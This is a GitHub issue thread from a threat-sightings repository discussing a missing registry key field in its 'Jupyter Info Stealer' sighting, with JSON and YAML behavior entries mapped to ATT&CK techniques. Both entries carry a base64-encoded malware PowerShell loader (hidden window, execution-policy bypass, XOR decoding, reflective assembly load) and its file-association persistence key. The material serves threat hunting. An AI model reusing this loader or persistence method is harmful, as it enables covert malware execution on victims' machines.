### ISSUE TITLE
Inconsistent: Jupyter Registry 

### ISSUE THREAD

**Issue by dfirence** [mcafee-enterprise/ac3-threat-sightings#13]
Schema `1.6` states in the behavior section the support for `Registry Activity` information.  The `Jupyter Info Stealer` sighting has a strong indicator of obfuscation without the schema fields seen here in the wiki. 

<br />

**Please add ** the necessary Windows Registry KeyName/Value/Name of path of where the `RegValue Created` observation was seen. The end user is unable to pinpoint where in the Windows Registry they should hunt for the obfuscated file/information.

<br />

<br />

https://mcafee-enterprise.github.io/ac3-threat-sightings/docs/Getting%20Started/Schema#behavior-section

<br />
<br />

![image](https://user-images.githubusercontent.com/11415591/140000728-9a5cc61f-ae86-4269-813b-a6d8d5ea3565.png)

<br />
<br />

```json
        {
          "id": "9d723cbe-9bec-46a0-8e01-8cf576e073e7",
          "behavior": "PowerShell modifies default file association to executes highly obfuscated PowerShell commmand.",

          "type": "RegValue Created",

          "notes": [
            "Full registry value encoded b64 -  UG9XRVJTaEVsbCAtV2lOZE93c3R5TGUgaGlERGVOIC1lUCBCWVBBc3MgLWNvTU1BTkQgIiRhOTBkYzYxYjg4NzRlYjk0ZjE5Njg4N2I1ZGMwMT0nWGpGcGNuNUFlMmQ1Wmo0MGZtbExibGw0YUd0clFYSitiRzVXSzI5cWVITlRRaXB4VENFeVRHeEVkbkpYZUROeVlESnpSanRhUjJzckxYY3RhMFF0YURabmZXeEhQbmhnZDBsa2FVaHlRRlpyUEQ1QWRWa21abDR4YUhCOFFHQjdVMEplVFhSRFlsNVBWWGh6UUh4RFlGZEFVeVk0ZFY1UWMySllYbTUwYlhkQWRUQTBaMEI3Y0hNd1FIeENOWDVlVVdaV0tsNXZOamxFUUg1NVozRkFVMk5KU0Y0d1kzdDMnOyRhYWNmMDhkYjVjNjQ5MWJhMDQ1NWEyYWRlY2EzMz1bU3lTdGVNLklvLkZpTEVdOjpSZWFkQUxsQllURVMoJ0M6XFVzZXJzXGFkbWluXEFwcERhdGFcUm9hbWluZ1xNSWNST3NPRlRcVUpJakJUQ3JYZlx0bkhhaWJXT0FrTklSRkdlLmlvQXNLUlBTZUZybmpYR09WYU0nKTtmT1IoJGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhPTA7JGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhIC1sVCAkYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzMuQ091TnQ7KXtmb1IoJGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkPTA7JGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkIC1sVCAkYTkwZGM2MWI4ODc0ZWI5NGYxOTY4ODdiNWRjMDEubEVuZ3RoOyRhNjQyYjYzMGViYzQxM2JkM2MyZTIzZThmZDQyZCsrKXskYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzNbJGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhXT0kYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzNbJGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhXSAtYnhPUiAkYTkwZGM2MWI4ODc0ZWI5NGYxOTY4ODdiNWRjMDFbJGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkXTskYTA4ZmM0YjNhYjE0YjdhOGRkMGNjZWNjMWE4NmErKztpZigkYTA4ZmM0YjNhYjE0YjdhOGRkMGNjZWNjMWE4NmEgLUdFICRhYWNmMDhkYjVjNjQ5MWJhMDQ1NWEyYWRlY2EzMy5jb1VOVCl7JGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkPSRhOTBkYzYxYjg4NzRlYjk0ZjE5Njg4N2I1ZGMwMS5MRU5nVGh9fX07W3NZc3RFbS5yZUZsZUNUaW9uLkFTU0VtQkxZXTo6bG9hRCgkYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzMpO1ttYVJTLmRlSU1PU106OkluVGVyQUN0KCkiCgo=",
            "this file association will cause the execution of the highly obfuscated PowerShell command when the file extension is used",
            "System.Reflection.Assembly is used for execution.",
            "randomized file extension nnfjzceglbgu"
          ],
          "att&ck": {
            "persistence": [
              "T1112 - Modify Registry",
              "T1546.001 - Event Triggered Execution: Change Default File Association"
            ],
            "defenseEvasion": [
              "T1027 - Obfuscated Files or Information"
            ]
          },
          "process": "C:\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"
        }
```

**Comment by jstnk9** [comment]
Could be an error with your conversion to JSON format?

The information is available in the sighting, you can see the next image from the sighting published in the repo.

![image](https://user-images.githubusercontent.com/7794663/140087192-3fabb1a0-74af-4f67-8bf5-e7431708da75.png)

```yaml
      - behavior: PowerShell modifies default file association to executes highly obfuscated PowerShell commmand.
        type: RegValue Created
        id: 9d723cbe-9bec-46a0-8e01-8cf576e073e7
        keyName: HKEY_CLASSES_ROOT\\nnfjzceglbgu\\shell\\open\\command
        keyValue: 'PoWERShEll -WiNdOwstyLe hiDDeN -eP BYPAss -coMMAND  *REDACTED* [SySteM.Io.FiLE]::ReadALlBYTES *REDACTED* [sYstEm.reFleCTion.ASSEmBLY]::loaD($aacf08db5c6491ba0455a2adeca33);[maRS.deIMOS]::InTerACt()'
        process: C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe
        notes:
        - Full registry value encoded b64 -  UG9XRVJTaEVsbCAtV2lOZE93c3R5TGUgaGlERGVOIC1lUCBCWVBBc3MgLWNvTU1BTkQgIiRhOTBkYzYxYjg4NzRlYjk0ZjE5Njg4N2I1ZGMwMT0nWGpGcGNuNUFlMmQ1Wmo0MGZtbExibGw0YUd0clFYSitiRzVXSzI5cWVITlRRaXB4VENFeVRHeEVkbkpYZUROeVlESnpSanRhUjJzckxYY3RhMFF0YURabmZXeEhQbmhnZDBsa2FVaHlRRlpyUEQ1QWRWa21abDR4YUhCOFFHQjdVMEplVFhSRFlsNVBWWGh6UUh4RFlGZEFVeVk0ZFY1UWMySllYbTUwYlhkQWRUQTBaMEI3Y0hNd1FIeENOWDVlVVdaV0tsNXZOamxFUUg1NVozRkFVMk5KU0Y0d1kzdDMnOyRhYWNmMDhkYjVjNjQ5MWJhMDQ1NWEyYWRlY2EzMz1bU3lTdGVNLklvLkZpTEVdOjpSZWFkQUxsQllURVMoJ0M6XFVzZXJzXGFkbWluXEFwcERhdGFcUm9hbWluZ1xNSWNST3NPRlRcVUpJakJUQ3JYZlx0bkhhaWJXT0FrTklSRkdlLmlvQXNLUlBTZUZybmpYR09WYU0nKTtmT1IoJGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhPTA7JGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhIC1sVCAkYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzMuQ091TnQ7KXtmb1IoJGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkPTA7JGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkIC1sVCAkYTkwZGM2MWI4ODc0ZWI5NGYxOTY4ODdiNWRjMDEubEVuZ3RoOyRhNjQyYjYzMGViYzQxM2JkM2MyZTIzZThmZDQyZCsrKXskYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzNbJGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhXT0kYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzNbJGEwOGZjNGIzYWIxNGI3YThkZDBjY2VjYzFhODZhXSAtYnhPUiAkYTkwZGM2MWI4ODc0ZWI5NGYxOTY4ODdiNWRjMDFbJGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkXTskYTA4ZmM0YjNhYjE0YjdhOGRkMGNjZWNjMWE4NmErKztpZigkYTA4ZmM0YjNhYjE0YjdhOGRkMGNjZWNjMWE4NmEgLUdFICRhYWNmMDhkYjVjNjQ5MWJhMDQ1NWEyYWRlY2EzMy5jb1VOVCl7JGE2NDJiNjMwZWJjNDEzYmQzYzJlMjNlOGZkNDJkPSRhOTBkYzYxYjg4NzRlYjk0ZjE5Njg4N2I1ZGMwMS5MRU5nVGh9fX07W3NZc3RFbS5yZUZsZUNUaW9uLkFTU0VtQkxZXTo6bG9hRCgkYWFjZjA4ZGI1YzY0OTFiYTA0NTVhMmFkZWNhMzMpO1ttYVJTLmRlSU1PU106OkluVGVyQUN0KCkiCgo=
        - randomized file extension nnfjzceglbgu
        - this file association will cause the execution of the highly obfuscated PowerShell command when the file extension is used
        - System.Reflection.Assembly is used for execution.
        att&ck:
          persistence:
          - "T1112 - Modify Registry"
          - "T1546.001 - Event Triggered Execution: Change Default File Association"
          defenseEvasion:
          - "T1027 - Obfuscated Files or Information"
```
